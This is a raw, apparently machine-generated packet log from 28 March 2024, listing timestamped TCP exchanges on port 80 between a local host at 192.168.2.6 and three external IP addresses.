                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478631973 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478741884 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478785992 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478806019 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478817940 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478828907 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478842974 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478867054 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478882074 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478888988 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478907108 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478929043 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.478945017 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.665885925 CET804971081.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.715929985 CET4971080192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.832129002 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.832150936 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.832161903 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.832169056 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.832180023 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.832196951 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.832351923 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.832351923 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.222608089 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.551179886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.551259995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.551417112 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.879834890 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885752916 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885772943 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885786057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885799885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885821104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885827065 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885873079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885874987 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885890007 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885901928 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885916948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885917902 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885943890 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885972977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.886010885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.066931963 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.066955090 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.066986084 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067004919 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067014933 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067019939 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067043066 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067058086 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067066908 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067079067 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067101002 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067106009 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067128897 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067132950 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067137003 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067156076 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067172050 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.067260027 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214643955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214665890 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214680910 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214694977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214709997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214709997 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214740992 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214741945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214785099 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214801073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214814901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214828968 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214859962 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214865923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214890957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214907885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214936972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214962006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214976072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214984894 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215006113 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215027094 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215065956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215079069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215096951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215107918 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215111971 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215123892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215154886 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.215154886 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543454885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543478966 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543539047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543540955 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543560028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543602943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543632984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543648005 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543661118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543678045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543675900 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543694973 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543709993 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543735981 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543751001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543764114 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543802023 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543839931 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543850899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543922901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543960094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.543989897 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544027090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544061899 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544073105 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544099092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544132948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544178009 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544207096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544230938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544245005 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544266939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544281006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544312954 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544331074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544344902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544359922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544367075 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544379950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544395924 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544425011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544440031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544452906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544462919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544471979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544482946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544492006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544550896 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544554949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544584990 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544598103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544622898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544622898 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544661999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544677019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544691086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544703960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544723988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544734001 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.544766903 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.595876932 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.595910072 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.595952034 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.595982075 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872308969 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872339010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872370958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872409105 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872437954 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872481108 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872513056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872576952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872612953 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872652054 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872703075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872746944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872781038 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872826099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872859001 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872916937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.872993946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873059988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873096943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873126030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873209953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873244047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873280048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873311996 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873347044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873430967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873522043 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873560905 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873620987 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873655081 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873697042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873739958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873805046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873841047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873852015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873888969 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.873903990 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874001980 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874058962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874094963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874155998 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874191046 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874233007 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874310017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874396086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874438047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874439955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874475002 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874526978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874583006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874651909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874700069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874705076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874738932 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874766111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874846935 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874911070 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874946117 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.874983072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875015974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875072956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875139952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875211000 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875247955 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875289917 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875325918 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875341892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875395060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875479937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875515938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875550985 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875586987 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875617981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875674009 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875746012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875781059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875827074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875863075 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875911951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.875986099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876054049 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876094103 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876121998 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876157999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876214027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876261950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876327038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876362085 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876390934 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876431942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876471996 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876563072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876629114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876661062 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876696110 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876729965 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876769066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.876854897 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877000093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877032995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877060890 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877110958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877139091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877180099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877275944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877310991 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877324104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877360106 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877394915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877464056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877525091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877558947 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877598047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877633095 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877676010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877767086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.877839088 CET8049718103.23.232.80192.168.2.6
